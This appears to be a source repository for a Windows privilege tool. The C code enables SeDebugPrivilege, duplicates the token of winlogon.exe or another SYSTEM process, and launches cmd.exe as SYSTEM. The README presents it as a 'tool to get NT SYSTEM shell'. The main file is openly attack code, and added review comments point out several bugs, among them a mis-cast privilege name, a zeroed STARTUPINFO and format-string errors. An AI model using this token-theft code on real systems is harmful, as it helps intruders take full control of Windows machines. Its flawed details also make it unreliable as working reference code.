├── nt-system.h
├── Makefile
├── README.md
├── .gitattributes
├── nt-system.c
└── .gitignore
/nt-system.h:
--------------------------------------------------------------------------------
/* nt-system.h — declarations shared with nt-system.c.
 * NOTE(review): DWORD is a <windows.h> type and this header includes nothing,
 * so it is only usable after the .c file has already included <windows.h>. */
#pragma once

/* Looks a running process up by image name (exact, case-sensitive comparison
 * against the Toolhelp32 szExeFile field) and returns its PID, or 0 when no
 * such process exists or the process snapshot could not be taken.
 * name is only read, never modified. */
DWORD get_proc_id(char *name);

/* Writes "WARNING: <func> failed with error ..." to stderr; meant to be
 * called right after the Win32 API named by func has reported failure. */
void perrno(const char *func);

--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
# Cross-compiles nt-system.c into nt-system.exe. (The README refers to the
# binary as NT_sys_shell; this Makefile produces nt-system.exe.)
# CC is the C++ driver, so the built-in %.o: %.c rule that builds $(OBJ)
# compiles the source as C++ — nt-system.c relies on that (it uses C++
# `TYPE()` value-initialisation in several places).
CC = x86_64-w64-mingw32-g++
FILE = nt-system.exe
SRC = $(FILE:.exe=.c)
OBJ = $(FILE:.exe=.o)

$(FILE): $(OBJ)
	$(CC) $< -o $@

# No prerequisites and no recipe: make falls back to its built-in rule to
# compile $(OBJ) from nt-system.c. SRC is defined but never referenced.
$(OBJ):

clean:
	rm -- $(OBJ) $(FILE)
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# NT-SYSTEM
### this is just a re-write of the original code in C, if you're starring this, might as well give the original coder some love as he's the one who came up with the idea

tool to get NT SYSTEM shell , its works by duplicating tokens of already running system processes , you can also specify a process .
Usage :
run the following commands as admin
```
NT_sys_shell //in this case it uses winlogon by default
```
or
```
NT_sys_shell Name_of_process
```
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
###############################################################################
# Set default behavior to automatically normalize line endings.
###############################################################################
* text=auto

###############################################################################
# Set default behavior for command prompt diff.
8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 
###############################################################################
#*.doc diff=astextplain
#*.DOC diff=astextplain
#*.docx diff=astextplain
#*.DOCX diff=astextplain
#*.dot diff=astextplain
#*.DOT diff=astextplain
#*.pdf diff=astextplain
#*.PDF diff=astextplain
#*.rtf diff=astextplain
#*.RTF diff=astextplain

--------------------------------------------------------------------------------
/nt-system.c:
--------------------------------------------------------------------------------
/*
 * nt-system.c — opens a process that already runs as SYSTEM (winlogon.exe
 * unless a process name is given as argv[1]), duplicates its primary token
 * and starts cmd.exe under that token with CreateProcessWithTokenW.
 *
 * Preconditions (README: "run the following commands as admin"): the caller
 * must already be an elevated administrator — the first step enables
 * SeDebugPrivilege on the tool's own token, and by default only
 * administrative tokens carry that privilege. This is an admin-to-SYSTEM
 * step, not an escalation from an unprivileged account, and every step is an
 * ordinary, auditable Win32 API call made by this process itself.
 *
 * Build note: the Makefile invokes x86_64-w64-mingw32-g++, so this file is
 * compiled as C++. `TOKEN_PRIVILEGES()`, `SECURITY_ATTRIBUTES()` and
 * `STARTUPINFO()` below are C++ value-initialisation and do not compile as C
 * (`= {0}` is the C spelling).
 */

/* NOTE(review): the three include targets were lost in this listing. The
 * APIs used here come from <windows.h>, <tlhelp32.h> (Toolhelp snapshot /
 * Process32First) and <stdio.h> — confirm against the repository. */
#include
#include
#include

#include "nt-system.h"

/* dwLogonFlags values for CreateProcessWithTokenW: WithProfile (1) is
 * LOGON_WITH_PROFILE, NetCredentialsOnly (2) is LOGON_NETCREDENTIALS_ONLY. */
enum LogonFlags { WithProfile = 1, NetCredentialsOnly };

/* Mirrors of the CREATE_* dwCreationFlags constants from <windows.h>
 * (NewConsole == CREATE_NEW_CONSOLE, 0x10). Only NewConsole is used below. */
enum CreationFlags
{
    DefaultErrorMode = 0x04000000,
    NewConsole = 0x00000010,
    NewProcessGroup = 0x00000200,
    SeparateWOWVDM = 0x00000800,
    Suspended = 0x00000004,
    UnicodeEnvironment = 0x00000400,
    ExtendedStartupInfoPresent = 0x00080000
};
/* Unused fallback definition of LUID, left commented out. */
/*
#ifndef LUID

struct _LUID {
    DWORD LowPart;
    LONG HighPart;
} LUID, * PLUID;

#endif
*/
/* Fallback access-mask definitions for builds whose headers lack them.
 * NOTE(review): with <windows.h> included this branch is skipped, which is
 * just as well — the `=` inside each #define would make e.g. TOKEN_QUERY
 * expand to `= 0x0008` and break every use below if it were ever taken. */
#ifndef TOKEN_QUERY
#define STANDARD_RIGHTS_REQUIRED = 0x000F0000
#define STANDARD_RIGHTS_READ = 0x00020000
#define TOKEN_ASSIGN_PRIMARY = 0x0001
#define TOKEN_DUPLICATE = 0x0002
#define TOKEN_IMPERSONATE = 0x0004
#define TOKEN_QUERY = 0x0008
#define TOKEN_QUERY_SOURCE = 0x0010
#define TOKEN_ADJUST_PRIVILEGES = 0x0020
#define TOKEN_ADJUST_GROUPS = 0x0040
#define TOKEN_ADJUST_DEFAULT = 0x0080
#define TOKEN_ADJUST_SESSIONID = 0x0100
#define TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY)
#define TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | TOKEN_ASSIGN_PRIMARY | \
TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_QUERY_SOURCE |\
TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_GROUPS | TOKEN_ADJUST_DEFAULT |\
TOKEN_ADJUST_SESSIONID)
#endif

/* Entry point. argv[1], when present, names the process whose token is
 * duplicated; otherwise winlogon.exe is used. Returns 0 on success; failure
 * paths mix exit(EXIT_FAILURE), exit(1) and return -1 (see notes). */
int main(int argc, char *argv[]){

    BOOL is_winlogon = FALSE;

    /* Anything other than exactly one argument (so also argc > 2) falls back
     * to winlogon.exe as the token source. */
    if (argc != 2) {
        puts("\n[+]using by default winlogon.exe\n");
        is_winlogon = TRUE;
    }

    /* Enabling SeDebugpriv in case its not enabled */

    const WCHAR* Privilege = L"SeDebugPrivilege";

    HANDLE token;             /* first our own token, later the target's (see below) */
    PHANDLE hToken = &token;  /* alias handed to both OpenProcessToken calls */
    LUID luid;
    TOKEN_PRIVILEGES TP;
    LUID_AND_ATTRIBUTES lu_attr ;
    DWORD trash;              /* ReturnLength from AdjustTokenPrivileges; never read */

    /* NOTE(review): OpenProcess returns NULL on failure, not
     * INVALID_HANDLE_VALUE, so this check can never fire. The pseudo-handle
     * from GetCurrentProcess() would avoid the OpenProcess call (and the
     * CloseHandle bookkeeping on every error path) altogether. */
    HANDLE hCurrentproc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, GetCurrentProcessId());
    if(hCurrentproc == INVALID_HANDLE_VALUE){
        puts("[-] Couldn't open handle to current process\n");
        exit(EXIT_FAILURE);
    }

    /* The (char *) cast on the literal is unnecessary: perrno() takes const char *. */
    if(!OpenProcessToken(hCurrentproc, TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES,hToken)){
        fprintf(stderr, "[-] error retrieving token for the current process :\n");
        perrno((char *)"OpenProcessToken");
        CloseHandle(hCurrentproc);
        exit(EXIT_FAILURE);
    }

    /* NOTE(review): Privilege is a wide string but is cast to LPCSTR. The
     * Makefile does not define UNICODE, so LookupPrivilegeValue resolves to
     * the A variant and sees only the first byte ("S") of the name — this
     * presumably fails unless UNICODE is defined somewhere not shown here;
     * confirm. The error branch also uses perror(), which reports the C
     * library errno rather than GetLastError(); the other branches use the
     * file's own perrno() helper. */
    if(!LookupPrivilegeValue(NULL, (LPCSTR)Privilege, &luid)){
        fprintf(stderr, "[-] couldnt get a handle to privilege struct\n");
        perror("LookupPrivilegeValue");
        CloseHandle(hCurrentproc);
        exit(EXIT_FAILURE);
    }

    /* Saving old state */
    /* C++ value-initialisation (all-zero); not valid C. Receives the previous
     * privilege state from AdjustTokenPrivileges but is never read back. */
    TOKEN_PRIVILEGES old_state = TOKEN_PRIVILEGES();

    lu_attr.Luid = luid;
    lu_attr.Attributes = SE_PRIVILEGE_ENABLED;
    TP.PrivilegeCount = 1;
    TP.Privileges[0] = lu_attr;

    /* NOTE(review): GetLastError() returns a DWORD; "%d" expects int ("%lu"
     * matches). This branch also leaks hCurrentproc and token, and uses a
     * bare exit(1) where the branches above use EXIT_FAILURE. */
    if (!AdjustTokenPrivileges(token, FALSE, &TP, (unsigned __int32)sizeof(TP), &old_state, &trash)) {
        printf("%d", GetLastError());
        puts("[-] can't adjust token for debug priveleges ");
        exit(1);
    }
    puts("[+] SeDebugPrivilege set up correctly!\n");

    /* duplicating the token */

    /* get_proc_id() returns 0 when no process of that name exists; OpenProcess
     * on PID 0 then fails and returns NULL, so the !target check below is the
     * one that actually catches a missing process.
     * NOTE(review): the "%d" conversion is handed a char * (argv[1] or the
     * literal) — undefined behaviour; "%s" is the intended conversion. This
     * path also returns -1 while every other failure path calls exit(). */
    HANDLE target = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, is_winlogon ? get_proc_id((char *)"winlogon.exe") : get_proc_id(argv[1]));
    if(!target){
        fprintf(stderr, "Can't find %d PID", is_winlogon ? "winlogon.exe" : argv[1]);
        CloseHandle(hCurrentproc);
        return -1;
    }

    SECURITY_IMPERSONATION_LEVEL seImpLv = SecurityImpersonation;
    TOKEN_TYPE tkentype = TokenPrimary;
    /* C++ value-initialisation again: sec_att stays all-zero. */
    SECURITY_ATTRIBUTES sec_att = SECURITY_ATTRIBUTES();
    HANDLE newtoken;

    /* NOTE(review): dead branch — a failed OpenProcess was already caught by
     * the NULL check above, and OpenProcess never returns
     * INVALID_HANDLE_VALUE. */
    if (target == INVALID_HANDLE_VALUE)
    {
        puts("[-] Couldn't open handle to target process\n");
        CloseHandle(hCurrentproc);
        exit(1);
    }

    /* NOTE(review): this overwrites `token` (still holding the handle to our
     * own token from the first OpenProcessToken) without closing it. On
     * failure the target handle is leaked as well. */
    if (!OpenProcessToken(target, TOKEN_READ | TOKEN_IMPERSONATE | TOKEN_DUPLICATE, hToken))
    {

        puts("[-] error retrieving token for the target process\n");
        CloseHandle(hCurrentproc);
        exit(1);
    }
    puts("[+] system process token retrieved\n");
    /* Same "%d"-with-DWORD mismatch as above; the message also carries the
     * "[+]" success prefix for what is a failure. */
    if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, &sec_att, seImpLv, tkentype, &newtoken))
    {
        printf("%d", GetLastError());
        puts("[+] unable to duplicate token \n");
        CloseHandle(hCurrentproc);
        exit(1);
    }
    puts("[+] Token duplicated successfully\n");

    /* Creating the new process and getting NT AUTHORITY privilege */
    /* SI is the ANSI STARTUPINFO, cast to the W variant in the call below;
     * that only works because every string member is NULL. It is
     * value-initialised, so all members (including cb) are 0. */
    STARTUPINFO SI = STARTUPINFO();
    PROCESS_INFORMATION PI;

    /* NetCredentialsOnly and NewConsole come from the enums at the top of the
     * file. The "[+]" prefix on the failure message is again misleading, and
     * the branch uses exit(1). */
    if (!CreateProcessWithTokenW(newtoken, NetCredentialsOnly, L"C:\\Windows\\System32\\cmd.exe", NULL, NewConsole, 0, NULL, (LPSTARTUPINFOW)&SI, &PI))
    {

        puts("[+] unable to create process \n");
        CloseHandle(hCurrentproc);
        exit(1);
    }
    puts("[+] process Created success !");
    /* NOTE(review): hCurrentproc, target, token, newtoken and the
     * PI.hProcess / PI.hThread handles are all left open here. The OS
     * reclaims them at process exit, but the failure paths do close
     * hCurrentproc, so the cleanup style is inconsistent. */
    return 0;
}

/* Returns the PID of the first process in a Toolhelp snapshot whose
 * szExeFile compares equal to name (strcmp: exact, case-sensitive), or 0
 * when nothing matched or the snapshot could not be taken. main() passes
 * that 0 straight to OpenProcess, which then fails.
 * NOTE(review): szExeFile is a TCHAR array, so the strcmp would not compile
 * under a UNICODE build. */
DWORD get_proc_id(char *name){
    DWORD pid = 0;
    PROCESSENTRY32 pe = {0};

    HANDLE h = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if(h == INVALID_HANDLE_VALUE){
        /* NOTE(review): GetLastError() is a DWORD; "%lld" reads a 64-bit
         * argument from a 32-bit one — undefined behaviour, "%lu" matches. */
        fprintf(stderr, "CreateToolhelp32Snapshot failed with %lld\n", GetLastError());
        return pid;
    }

    /* dwSize must be set before Process32First; the rest of pe stays zero. */
    pe.dwSize = sizeof(PROCESSENTRY32);
    if(Process32First(h, &pe)){
        do{
            if(!strcmp(pe.szExeFile, name)){
                pid = pe.th32ProcessID;
                break;
            }
        }while(Process32Next(h, &pe));
    }
    else
        perrno((char *)"Process32First");

    CloseHandle(h);

    return pid;
}

/* Prints a warning naming the failed Win32 call plus a system-formatted
 * description of an error code.
 * NOTE(review): errn is never assigned before being handed to FormatMessage
 * (reading an uninitialised automatic is undefined behaviour), and the
 * number printed is the C library's errno rather than the Win32 error —
 * capturing GetLastError() into errn on entry, and printing that same value,
 * is what every caller expects. The buffer length 256 is also repeated as a
 * magic number. */
void perrno(const char *func){
    TCHAR err_msg[256] = {0};
    DWORD errn;

    FormatMessage( FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
                   NULL, errn,
                   MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
                   err_msg, 256, NULL );

    fprintf(stderr, "\n WARNING: %s failed with error %d (%s)\n", func, errno, err_msg );
}

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore

# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates

# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs

# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/

# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/

# Visual Studio 2017 auto generated files
Generated\ Files/

# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*

# NUNIT
*.VisualState.xml
TestResult.xml

# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c

# Benchmark Results
BenchmarkDotNet.Artifacts/

# .NET Core
project.lock.json
project.fragment.lock.json

artifacts/ 58 | 59 | # StyleCop 60 | StyleCopReport.xml 61 | 62 | # Files built by Visual Studio 63 | *_i.c 64 | *_p.c 65 | *_h.h 66 | *.ilk 67 | *.meta 68 | *.obj 69 | *.iobj 70 | *.pch 71 | *.pdb 72 | *.ipdb 73 | *.pgc 74 | *.pgd 75 | *.rsp 76 | *.sbr 77 | *.tlb 78 | *.tli 79 | *.tlh 80 | *.tmp 81 | *.tmp_proj 82 | *_wpftmp.csproj 83 | *.log 84 | *.vspscc 85 | *.vssscc 86 | .builds 87 | *.pidb 88 | *.svclog 89 | *.scc 90 | 91 | # Chutzpah Test files 92 | _Chutzpah* 93 | 94 | # Visual C++ cache files 95 | ipch/ 96 | *.aps 97 | *.ncb 98 | *.opendb 99 | *.opensdf 100 | *.sdf 101 | *.cachefile 102 | *.VC.db 103 | *.VC.VC.opendb 104 | 105 | # Visual Studio profiler 106 | *.psess 107 | *.vsp 108 | *.vspx 109 | *.sap 110 | 111 | # Visual Studio Trace Files 112 | *.e2e 113 | 114 | # TFS 2012 Local Workspace 115 | $tf/ 116 | 117 | # Guidance Automation Toolkit 118 | *.gpState 119 | 120 | # ReSharper is a .NET coding add-in 121 | _ReSharper*/ 122 | *.[Rr]e[Ss]harper 123 | *.DotSettings.user 124 | 125 | # JustCode is a .NET coding add-in 126 | .JustCode 127 | 128 | # TeamCity is a build add-in 129 | _TeamCity* 130 | 131 | # DotCover is a Code Coverage Tool 132 | *.dotCover 133 | 134 | # AxoCover is a Code Coverage Tool 135 | .axoCover/* 136 | !.axoCover/settings.json 137 | 138 | # Visual Studio code coverage results 139 | *.coverage 140 | *.coveragexml 141 | 142 | # NCrunch 143 | _NCrunch_* 144 | .*crunch*.local.xml 145 | nCrunchTemp_* 146 | 147 | # MightyMoose 148 | *.mm.* 149 | AutoTest.Net/ 150 | 151 | # Web workbench (sass) 152 | .sass-cache/ 153 | 154 | # Installshield output folder 155 | [Ee]xpress/ 156 | 157 | # DocProject is a documentation generator add-in 158 | DocProject/buildhelp/ 159 | DocProject/Help/*.HxT 160 | DocProject/Help/*.HxC 161 | DocProject/Help/*.hhc 162 | DocProject/Help/*.hhk 163 | DocProject/Help/*.hhp 164 | DocProject/Help/Html2 165 | DocProject/Help/html 166 | 167 | # Click-Once directory 168 | publish/ 169 | 170 | # Publish Web Output 171 | 
*.[Pp]ublish.xml 172 | *.azurePubxml 173 | # Note: Comment the next line if you want to checkin your web deploy settings, 174 | # but database connection strings (with potential passwords) will be unencrypted 175 | *.pubxml 176 | *.publishproj 177 | 178 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 179 | # checkin your Azure Web App publish settings, but sensitive information contained 180 | # in these scripts will be unencrypted 181 | PublishScripts/ 182 | 183 | # NuGet Packages 184 | *.nupkg 185 | # The packages folder can be ignored because of Package Restore 186 | **/[Pp]ackages/* 187 | # except build/, which is used as an MSBuild target. 188 | !**/[Pp]ackages/build/ 189 | # Uncomment if necessary however generally it will be regenerated when needed 190 | #!**/[Pp]ackages/repositories.config 191 | # NuGet v3's project.json files produces more ignorable files 192 | *.nuget.props 193 | *.nuget.targets 194 | 195 | # Microsoft Azure Build Output 196 | csx/ 197 | *.build.csdef 198 | 199 | # Microsoft Azure Emulator 200 | ecf/ 201 | rcf/ 202 | 203 | # Windows Store app package directories and files 204 | AppPackages/ 205 | BundleArtifacts/ 206 | Package.StoreAssociation.xml 207 | _pkginfo.txt 208 | *.appx 209 | 210 | # Visual Studio cache files 211 | # files ending in .cache can be ignored 212 | *.[Cc]ache 213 | # but keep track of directories ending in .cache 214 | !?*.[Cc]ache/ 215 | 216 | # Others 217 | ClientBin/ 218 | ~$* 219 | *~ 220 | *.dbmdl 221 | *.dbproj.schemaview 222 | *.jfm 223 | *.pfx 224 | *.publishsettings 225 | orleans.codegen.cs 226 | 227 | # Including strong name files can present a security risk 228 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 229 | #*.snk 230 | 231 | # Since there are multiple workflows, uncomment next line to ignore bower_components 232 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 233 | #bower_components/ 234 | 235 | # RIA/Silverlight 
projects 236 | Generated_Code/ 237 | 238 | # Backup & report files from converting an old project file 239 | # to a newer Visual Studio version. Backup files are not needed, 240 | # because we have git ;-) 241 | _UpgradeReport_Files/ 242 | Backup*/ 243 | UpgradeLog*.XML 244 | UpgradeLog*.htm 245 | ServiceFabricBackup/ 246 | *.rptproj.bak 247 | 248 | # SQL Server files 249 | *.mdf 250 | *.ldf 251 | *.ndf 252 | 253 | # Business Intelligence projects 254 | *.rdl.data 255 | *.bim.layout 256 | *.bim_*.settings 257 | *.rptproj.rsuser 258 | *- Backup*.rdl 259 | 260 | # Microsoft Fakes 261 | FakesAssemblies/ 262 | 263 | # GhostDoc plugin setting file 264 | *.GhostDoc.xml 265 | 266 | # Node.js Tools for Visual Studio 267 | .ntvs_analysis.dat 268 | node_modules/ 269 | 270 | # Visual Studio 6 build log 271 | *.plg 272 | 273 | # Visual Studio 6 workspace options file 274 | *.opt 275 | 276 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 277 | *.vbw 278 | 279 | # Visual Studio LightSwitch build output 280 | **/*.HTMLClient/GeneratedArtifacts 281 | **/*.DesktopClient/GeneratedArtifacts 282 | **/*.DesktopClient/ModelManifest.xml 283 | **/*.Server/GeneratedArtifacts 284 | **/*.Server/ModelManifest.xml 285 | _Pvt_Extensions 286 | 287 | # Paket dependency manager 288 | .paket/paket.exe 289 | paket-files/ 290 | 291 | # FAKE - F# Make 292 | .fake/ 293 | 294 | # JetBrains Rider 295 | .idea/ 296 | *.sln.iml 297 | 298 | # CodeRush personal settings 299 | .cr/personal 300 | 301 | # Python Tools for Visual Studio (PTVS) 302 | __pycache__/ 303 | *.pyc 304 | 305 | # Cake - Uncomment if you are using it 306 | # tools/** 307 | # !tools/packages.config 308 | 309 | # Tabs Studio 310 | *.tss 311 | 312 | # Telerik's JustMock configuration file 313 | *.jmconfig 314 | 315 | # BizTalk build output 316 | *.btp.cs 317 | *.btm.cs 318 | *.odx.cs 319 | *.xsd.cs 320 | 321 | # OpenCover UI analysis results 322 | OpenCover/ 323 | 324 | # Azure Stream Analytics local run 
output 325 | ASALocalRun/ 326 | 327 | # MSBuild Binary and Structured Log 328 | *.binlog 329 | 330 | # NVidia Nsight GPU debugger configuration file 331 | *.nvuser 332 | 333 | # MFractors (Xamarin productivity tool) working folder 334 | .mfractor/ 335 | 336 | # Local History for Visual Studio 337 | .localhistory/ 338 | 339 | # BeatPulse healthcheck temp database 340 | healthchecksdb --------------------------------------------------------------------------------